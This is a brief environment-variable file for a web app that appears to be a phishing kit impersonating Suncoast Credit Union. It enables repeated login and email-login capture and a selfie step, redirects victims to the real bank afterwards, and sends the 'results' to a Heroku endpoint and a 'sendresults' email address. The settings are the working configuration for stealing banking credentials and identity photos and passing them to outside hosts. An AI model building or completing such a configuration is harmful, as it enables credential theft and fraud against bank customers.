NEXT_PUBLIC_DOCS_PAGE=ON
NEXT_PUBLIC_EXIT_URL="https://banking.suncoastcreditunion.com"
NEXT_PUBLIC_DOUBLE_LOGIN=ON
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=ON
NEXT_PUBLIC_TAKE_SELFIE=ON
RES_LINK=https://rocketresults.herokuapp.com
TO=sendresults@rocketsms.me
KEY=149009077518912